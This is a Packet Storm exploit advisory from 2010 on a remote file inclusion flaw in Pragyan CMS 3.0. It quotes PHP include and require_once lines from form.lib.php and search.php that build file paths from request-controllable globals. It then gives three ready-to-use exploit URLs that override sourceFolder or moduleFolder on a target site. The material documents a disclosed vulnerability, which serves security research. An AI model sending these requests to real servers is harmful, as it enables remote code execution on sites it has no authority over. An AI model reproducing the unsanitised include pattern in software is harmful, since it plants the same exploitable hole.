Pragyan CMS 3.0 Remote File Inclusion

2010-10-23T00:00:00
ID PACKETSTORM:95141
Type packetstorm
Reporter Cru3l.b0y
Modified 2010-10-23T00:00:00

Description

                                        
                                            `  
In The Name Of GOD  
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
+ +  
+ Pragyan CMS 3.0 Remote File Inclusion Vulnerability +  
+ +  
+ Discovered by Cru3l.b0y +  
+ +  
+ +  
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
  
  
  
  
  
[+] Exploit Title: Pragyan CMS 3.0 Remote File Inclusion Vulnerability  
[+] Date: 2010-10-21  
[+] Author : Cru3l.b0y  
[+] Software Link: http://switch.dl.sourceforge.net/project/pragyan/pragyan/3.0/pragyanv3.0-alpha.tar.bz2  
[+] Version: 3.0  
[+] Tested on: Ubuntu 10.10  
[+] Contact : Cru3l.b0y@gmail.com  
[+] Website : WwW.PenTesters.IR  
[+] Greeting: Behzad, Ahmad, Arash, Kose Ameye Baghie  
[+] register_globals = On  
  
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
[+] Vul Code [1]: "/cms/modules/form.lib.php"  
  
37 global $sourceFolder;  
38 global $moduleFolder;  
39 require_once("$sourceFolder/$moduleFolder/form/editform.php");  
40 require_once("$sourceFolder/$moduleFolder/form/editformelement.php");  
41 require_once("$sourceFolder/$moduleFolder/form/registrationformgenerate.php");  
42 require_once("$sourceFolder/$moduleFolder/form/registrationformsubmit.php");  
43 require_once("$sourceFolder/$moduleFolder/form/viewregistrants.php");  
  
[+] Exploit [1]:  
  
http://target/path/cms/modules/form.lib.php?sourceFolder=script  
  
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
[+] Vul Code [2]: "/cms/modules/search/search.php"  
  
31 $searchModuleFolder = "$sourceFolder/$moduleFolder/search";  
32 $include_dir = "$searchModuleFolder/include";  
33 include ("$include_dir/commonfuncs.php");  
  
[+] Exploit [2]:  
  
http://target/path/cms/modules/search/search.php?moduleFolder=script  
http://target//path/cms/modules/search/search.php?sourceFolder=script  
  
  
`